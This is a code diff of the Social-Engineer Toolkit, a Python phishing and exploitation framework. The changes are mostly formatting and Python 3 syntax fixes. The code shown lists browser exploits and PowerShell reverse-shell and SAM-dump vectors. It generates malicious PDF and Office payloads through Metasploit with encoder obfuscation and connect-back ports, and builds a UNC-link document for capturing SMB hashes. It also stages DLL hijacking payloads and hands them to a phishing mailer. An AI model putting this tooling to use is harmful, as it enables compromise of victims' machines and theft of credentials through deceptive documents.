'Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)',
'Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)',
'MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)',
'Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)',
'Adobe Flash Player Object Type Confusion (2012-05-04)',
'Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)',
'MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)',
'Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)',
'MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)',
'Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)',
'Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)',
'Internet Explorer CSS Import Use After Free (2010-11-29)',
'Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)',
'Internet Explorer CSS Tags Memory Corruption (2010-11-03)',
'Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)',
'Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)',
'Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)',
'Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)',
'Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)',
'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)',
'Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)',
'Microsoft Help Center XSS and Command Execution (2010-06-09)',
'Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)',
'Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)',
'Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)',
'Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)',
'Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)',
'Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)',
'Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)',
'Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)',
'FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)',
'FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)',
'Metasploit Browser Autopwn (USE AT OWN RISK!)\n']
browser_exploits_text = """
Enter the browser exploit you would like to use [8]:
@ -373,10 +373,10 @@ browser_exploits_text = """
# this is for the powershell attack vectors
powershell_menu = ['Powershell Alphanumeric Shellcode Injector',
'Powershell Reverse Shell',
'Powershell Bind Shell',
'Powershell Dump SAM Database',
'0D']
'Powershell Reverse Shell',
'Powershell Bind Shell',
'Powershell Dump SAM Database',
'0D']
powershell_text = ("""
The """ + bcolors.BOLD + """Powershell Attack Vector""" + bcolors.ENDC + """ module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by preventative technologies.\n""")

15
src/core/module_handler.py
View file

@ -1,6 +1,6 @@
#!/usr/bin/env python
## module_handler.py
# module_handler.py
import glob
import re
@ -14,9 +14,10 @@ menu_return = "false"
counter = 0
# get the menu going
print "\n"
print("\n")
print_info_spaces("Social-Engineer Toolkit Third Party Modules menu.")
print_info_spaces("Please read the readme/modules.txt for information on how to create your own modules.\n")
print_info_spaces(
"Please read the readme/modules.txt for information on how to create your own modules.\n")
for name in glob.glob("modules/*.py"):
@ -30,9 +31,9 @@ for name in glob.glob("modules/*.py"):
line = line.replace('MAIN="', "")
line = line.replace('"', "")
line = " " + str(counter) + ". " + line
print line
print(line)
print "\n 99. Return to the previous menu\n"
print("\n 99. Return to the previous menu\n")
choice = raw_input(setprompt(["9"], ""))
if choice == 'exit':
@ -55,7 +56,7 @@ if menu_return == "false":
# pull any files in the modules directory that starts with .py
for name in glob.glob("modules/*.py"):
counter = counter+1
counter = counter + 1
if counter == int(choice):
# get rid of .modules extension
@ -76,6 +77,6 @@ if menu_return == "false":
try:
exec("%s.main()" % (name))
# handle the exception if main isn't there
except Exception, e:
except Exception as e:
raw_input(" [!] There was an issue with a module: %s." % (e))
return_continue()

262
src/core/msf_attacks/create_payload.py
View file

@ -1,5 +1,5 @@
#!/usr/bin/python
## PDF spear phishing attack here
# PDF spear phishing attack here
import subprocess
import re
@ -13,50 +13,52 @@ from src.core.dictionaries import *
from src.core.menu.text import *
me = mod_name()
definepath=os.getcwd()
definepath = os.getcwd()
define_version = get_version()
users_home = os.getenv("HOME")
# metasploit path
meta_path=meta_path()
meta_path = meta_path()
print meta_path
print(meta_path)
# define if we need apache or not for dll hijacking
# define if use apache or not
apache=0
apache = 0
# open set_config
apache_check=file("/etc/setoolkit/set.config","r").readlines()
apache_check = file("/etc/setoolkit/set.config", "r").readlines()
# loop this guy to search for the APACHE_SERVER config variable
for line in apache_check:
# strip \r\n
line=line.rstrip()
line = line.rstrip()
# if apache is turned on get things ready
match=re.search("APACHE_SERVER=ON",line)
match = re.search("APACHE_SERVER=ON", line)
# if its on lets get apache ready
if match:
for line2 in apache_check:
# set the apache path here
match2=re.search("APACHE_DIRECTORY=", line2)
match2 = re.search("APACHE_DIRECTORY=", line2)
if match2:
line2=line2.rstrip()
apache_path=line2.replace("APACHE_DIRECTORY=","")
apache=1
if os.path.isdir(apache_path + "/html"): apache_path = apache_path + "/html"
line2 = line2.rstrip()
apache_path = line2.replace("APACHE_DIRECTORY=", "")
apache = 1
if os.path.isdir(apache_path + "/html"):
apache_path = apache_path + "/html"
###################################################
# USER INPUT: SHOW PAYLOAD MENU #
###################################################
inputpdf=""
target=""
inputpdf = ""
target = ""
exploit = "INVALID"
while exploit == "INVALID":
debug_msg(me,"printing 'src.core.menu.text.create_payloads_menu'",5)
show_payload_menu1 = create_menu(create_payloads_text, create_payloads_menu)
debug_msg(me, "printing 'src.core.menu.text.create_payloads_menu'", 5)
show_payload_menu1 = create_menu(
create_payloads_text, create_payloads_menu)
exploit = raw_input(setprompt(["4"], ""))
print "\n"
print("\n")
# Do conditional checks for the value of 'exploit', which should be a number
# Handle any additional tasks before doing the dictionary lookup and
@ -67,37 +69,40 @@ while exploit == "INVALID":
exit_set()
if exploit == "":
exploit='1' # 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
# 'SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)'
exploit = '1'
if exploit == '3': #'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
outfile=("template.doc")
if exploit == '3': # 'Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow'
outfile = ("template.doc")
if exploit == '4': #'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
outfile=("template.rtf")
target=("TARGET=1")
# 'Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)'
if exploit == '4':
outfile = ("template.rtf")
target = ("TARGET=1")
if exploit == "5":
outfile = ("template.mov")
if exploit != '3' and exploit != '4' and exploit !="17":
outfile=("template.pdf")
if exploit != '3' and exploit != '4' and exploit != "17":
outfile = ("template.pdf")
debug_msg(me,'current input was read as: %s' % exploit,3)
exploit=ms_attacks(exploit)
debug_msg(me,'value was translated to: %s' % exploit,3)
debug_msg(me, 'current input was read as: %s' % exploit, 3)
exploit = ms_attacks(exploit)
debug_msg(me, 'value was translated to: %s' % exploit, 3)
if exploit == "INVALID":
print_warning("that choice is invalid...please try again or press ctrl-c to Cancel.")
print_warning(
"that choice is invalid...please try again or press ctrl-c to Cancel.")
time.sleep(2)
# 'exploit' has been converted to the string by now, so we need to
# evaluate the string instead of the user input number from here on...
if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe_nojs":
print_info("Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
print """
print_info(
"Default payload creation selected. SET will generate a normal PDF with embedded EXE.")
print("""
1. Use your own PDF for attack
2. Use built-in BLANK PDF for attack\n"""
2. Use built-in BLANK PDF for attack\n""")
choicepdf = raw_input(setprompt(["4"], ""))
@ -106,92 +111,97 @@ if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit ==
if choicepdf == '1':
# define if user wants to use their own pdf or built in one
inputpdf=raw_input(setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
inputpdf = raw_input(
setprompt(["4"], "Enter path to your pdf [blank-builtin]"))
# if blank, then default to normal pdf
if inputpdf == "":
# change to default SET pdf
print_info("Defaulting to BLANK PDF built into SET...")
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
# if no file exists defalt this
if not os.path.isfile(inputpdf):
print_warning("Unable to find PDF, defaulting to blank PDF.")
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
if choicepdf == '2':
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
if choicepdf == "":
inputpdf= definepath + "/src/core/msf_attacks/form.pdf"
inputpdf = definepath + "/src/core/msf_attacks/form.pdf"
exploit_counter=0
exploit_counter = 0
if exploit == "dll_hijacking" or exploit == "unc_embed":
exploit_counter=1
exploit_counter = 1
if exploit_counter == 0:
###################################################
# USER INPUT: SHOW PAYLOAD MENU 3 #
###################################################
debug_msg(me,"printing 'src.core.menu.text.payload_menu_3'",5)
debug_msg(me, "printing 'src.core.menu.text.payload_menu_3'", 5)
show_payload_menu3 = create_menu(payload_menu_3_text, payload_menu_3)
payload=raw_input(setprompt(["4"], ""))
noencode=0
payload = raw_input(setprompt(["4"], ""))
noencode = 0
if payload == 'exit':
exit_set()
if payload == "" : payload="2"
if payload == "":
payload = "2"
if payload == '4' or payload == '5' or payload == '6':
noencode=1
payload=ms_payload_3(payload)
noencode = 1
payload = ms_payload_3(payload)
# imported from central, grabs ip address
rhost=grab_ipaddress()
rhost = grab_ipaddress()
# SET LPORT
lport=raw_input(setprompt(["4"], "Port to connect back on [443]"))
lport = raw_input(setprompt(["4"], "Port to connect back on [443]"))
# if blank default to 443
if lport == "":
lport="443"
lport = "443"
print_info("Defaulting to port 443...")
# SET FILE OUTPATH
# /root/.msf4/local/msf.pdf
filename_code = outfile
if os.path.isdir(users_home + "/.msf4/"):
msfpath = (users_home + "/.msf4/")
msfpath = (users_home + "/.msf4/")
if os.path.isdir(users_home + "/.msf5/"):
msfpath = (users_home + "/.msf5/")
msfpath = (users_home + "/.msf5/")
outpath=(msfpath + "local/" + outfile)
outpath = (msfpath + "local/" + outfile)
print_info("Generating fileformat exploit...")
# START THE EXE TO VBA PAYLOAD
if exploit != 'custom/exe/to/vba/payload':
output = setdir + "/%s" % (outfile)
if os.path.isfile(setdir + "/template.pdf"):
os.remove(setdir + "/template.pdf")
if os.path.isfile(msfpath + "local/template.pdf"):
os.remove(msfpath + "local/template.pdf")
if os.path.isfile(setdir + "/template.pdf"):
os.remove(setdir + "/template.pdf")
if os.path.isfile(msfpath + "local/template.pdf"):
os.remove(msfpath + "local/template.pdf")
filewrite = file(setdir + "/template.rc", "w")
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" % (rhost,lport,inputpdf,output))
filewrite.close()
child = pexpect.spawn("%smsfconsole -r %s/template.rc" % (meta_path, setdir))
a = 1
while a == 1:
if os.path.isfile(setdir + "/template.pdf"):
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
a = 2 #break
else:
print_status("Waiting for payload generation to complete...")
if os.path.isfile(msfpath + "local/" + outfile):
subprocess.Popen("cp %slocal/%s %s" % (msfpath, outfile,setdir), shell=True)
time.sleep(3)
filewrite = file(setdir + "/template.rc", "w")
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" %
(rhost, lport, inputpdf, output))
filewrite.close()
child = pexpect.spawn(
"%smsfconsole -r %s/template.rc" % (meta_path, setdir))
a = 1
while a == 1:
if os.path.isfile(setdir + "/template.pdf"):
subprocess.Popen("cp " + msfpath + "local/%s %s" % (filename_code, setdir),
stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
a = 2 # break
else:
print_status("Waiting for payload generation to complete...")
if os.path.isfile(msfpath + "local/" + outfile):
subprocess.Popen("cp %slocal/%s %s" %
(msfpath, outfile, setdir), shell=True)
time.sleep(3)
print_status("Payload creation complete.")
time.sleep(1)
@ -200,99 +210,120 @@ if exploit_counter == 0:
# Creating Payload here
# if not 64 specify raw output and filename of vb1.exe
if noencode == 0:
execute1=("raw")
payloadname=("vb1.exe")
execute1 = ("raw")
payloadname = ("vb1.exe")
if noencode == 1:
execute1=("exe")
payloadname=("vb.exe")
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True)
execute1 = ("exe")
payloadname = ("vb.exe")
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" %
(meta_path, payload, rhost, lport, execute1, setdir, payloadname), shell=True)
if noencode == 0:
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True)
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" %
(meta_path, setdir, setdir), shell=True)
# Create the VB script here
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % (meta_path,setdir,setdir), shell=True)
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" %
(meta_path, setdir, setdir), shell=True)
print_info("Raring the VBS file.")
subprocess.Popen("rar a %s/template.rar %s/template.vbs" % (setdir,setdir), shell=True)
subprocess.Popen("rar a %s/template.rar %s/template.vbs" %
(setdir, setdir), shell=True)
# NEED THIS TO PARSE DELIVERY OPTIONS TO SMTP MAILER
filewrite=file(setdir + "/payload.options","w")
filewrite.write(payload+" "+rhost+" "+lport)
filewrite = file(setdir + "/payload.options", "w")
filewrite.write(payload + " " + rhost + " " + lport)
filewrite.close()
if exploit != "dll_hijacking":
if not os.path.isfile(setdir + "/fileformat.file"):
sys.path.append("src/phishing/smtp/client/")
debug_msg(me,"importing 'src.phishing.smtp.client.smtp_client'",1)
try: reload(smtp_client)
except: import smtp_client
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try:
reload(smtp_client)
except:
import smtp_client
# start the unc_embed attack stuff here
if exploit == "unc_embed":
rhost=grab_ipaddress
import string,random
def random_string(minlength=6,maxlength=15):
length=random.randint(minlength,maxlength)
letters=string.ascii_letters+string.digits
rhost = grab_ipaddress
import string
import random
def random_string(minlength=6, maxlength=15):
length = random.randint(minlength, maxlength)
letters = string.ascii_letters + string.digits
return ''.join([random.choice(letters) for _ in range(length)])
rand_gen=random_string()
filewrite=file(setdir + "/unc_config", "w")
rand_gen = random_string()
filewrite = file(setdir + "/unc_config", "w")
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\r\n\r\n")
filewrite.close()
filewrite=file(setdir + "/template.doc", "w")
filewrite.write(r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' %(rhost,rand_gen))
filewrite = file(setdir + "/template.doc", "w")
filewrite.write(
r'''<html><head></head><body><img src="file://\\%s\%s.jpeg">''' % (rhost, rand_gen))
filewrite.close()
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'",1)
try: reload(smtp_client)
except: import smtp_client
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try:
reload(smtp_client)
except:
import smtp_client
# start the dll_hijacking stuff here
if exploit == "dll_hijacking":
sys.path.append("src/core/payloadgen")
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'",1)
try: reload(create_payloads)
except: import create_payloads
debug_msg(me, "importing 'src.core.payloadgen.create_payloads'", 1)
try:
reload(create_payloads)
except:
import create_payloads
sys.path.append("src/webattack/dll_hijacking")
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'",1)
try: reload(hijacking)
except: import hijacking
debug_msg(me, "importing 'src.webattack.dll_hijacking.hijacking'", 1)
try:
reload(hijacking)
except:
import hijacking
# if we are not using apache
if apache == 0:
if not os.path.isfile("%s/fileformat.file" % (setdir)):
# try:
filewrite=file(setdir + "/attack_vector","w")
# try:
filewrite = file(setdir + "/attack_vector", "w")
filewrite.write("hijacking")
filewrite.close()
filewrite=file(setdir + "/site.template","w")
filewrite = file(setdir + "/site.template", "w")
filewrite.write("TEMPLATE=CUSTOM")
filewrite.close()
time.sleep(1)
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (setdir,setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child=pexpect.spawn("python src/html/web_server.py")
subprocess.Popen("mkdir %s/web_clone;cp src/html/msf.exe %s/web_clone/x" % (
setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
child = pexpect.spawn("python src/html/web_server.py")
# except: child.close()
# if we are using apache
if apache == 1:
subprocess.Popen("cp src/html/msf.exe %s/x.exe" % (apache_path), shell=True).wait()
subprocess.Popen("cp src/html/msf.exe %s/x.exe" %
(apache_path), shell=True).wait()
if os.path.isfile(setdir + "/meta_config"):
# if we aren't using the infectious method then do normal routine
if not os.path.isfile("%s/fileformat.file" % (setdir)):
print_info("This may take a few to load MSF...")
try:
child1=pexpect.spawn("%smsfconsole -L -r %s/meta_config" % (meta_path,setdir))
child1 = pexpect.spawn(
"%smsfconsole -L -r %s/meta_config" % (meta_path, setdir))
except:
try:
child1.close()
except: pass
except:
pass
# get the emails out
# if we aren't using the infectious method then do the normal routine
if not os.path.isfile("%s/fileformat.file" % (setdir)):
sys.path.append("src/phishing/smtp/client/")
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'",1)
try: reload(smtp_client)
except: import smtp_client
debug_msg(me, "importing 'src.phishing.smtp.client.smtp_client'", 1)
try:
reload(smtp_client)
except:
import smtp_client
try:
child1.interact()
except:
@ -300,4 +331,5 @@ if exploit == "dll_hijacking":
try:
child.close()
child1.close()
except: pass
except:
pass

15
src/core/msf_attacks/msf_list.py
View file

@ -7,9 +7,12 @@ import sys
me = mod_name()
sys.path.append("src/core")
debug_msg(me,"re-importing 'src.core.setcore'",1)
try: reload(setcore)
except: import setcore
print "[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]"
generate_list=subprocess.Popen("%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
print "[---] Database is now up-to-date [---]"
debug_msg(me, "re-importing 'src.core.setcore'", 1)
try:
reload(setcore)
except:
import setcore
print("[---] Updating the Social Engineer Toolkit FileFormat Exploit List [---]")
generate_list = subprocess.Popen(
"%s/msfcli | grep fileformat > src/core/msf_attacks/database/msf.database" % (meta_path), shell=True).wait()
print("[---] Database is now up-to-date [---]")